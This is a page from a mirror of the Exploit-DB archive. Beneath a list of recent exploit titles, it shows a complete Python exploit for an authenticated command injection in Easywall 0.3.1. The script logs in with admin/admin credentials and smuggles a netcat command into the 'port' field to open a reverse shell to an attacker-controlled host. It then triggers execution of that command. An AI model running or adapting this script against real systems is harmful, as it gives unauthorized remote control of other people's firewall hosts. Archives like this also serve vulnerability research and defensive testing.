bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/51856.py
Exploit-DB 7ef8e488d8 DB: 2024-03-04 
22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution
2024-03-04 00:16:34 +00:00

61 lines
No EOL
2 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04
import requests, json, urllib3
urllib3.disable_warnings()
def exploit():
# Replace values needed here
target_host = "192.168.1.25"
target_port= "12227"
lhost = "192.168.1.10"
lport = "9001"
user = "admin"
password = "admin"
target = f"https://{target_host}:{target_port}"
# Authenticate to the app
print("[+] Attempting login with the provided credentials...")
login_data = {"username":user, "password":password}
session = requests.session()
try:
login = session.post(f'{target}/login',data=login_data,verify=False)
except Exception as ex:
print("[!] There was a problem connecting to the app, error:", ex)
exit(1)
if login.status_code != 200:
print("[!] Login failed.")
exit(1)
else:
print("[+] Login successfull.")
# Send the payload, the port parameter suffers from a command injection vulnerability
print("[+] Attempting to send payload.")
rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
if send_payload.status_code != 200:
print("[!] Failed to send payload.")
exit(1)
else:
print("[+] Payload sent.")
# Trigger the execution of the payload
print("[+] Attempting execution.")
data = {"step_1":"", "step_2":""}
execute = session.post(f"{target}/apply-save",data=data, verify=False)
if execute.status_code != 200:
print("[!] Attempt to execute failed.")
exit(1)
else:
print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")
exploit()
Reference in a new issue View git blame Copy permalink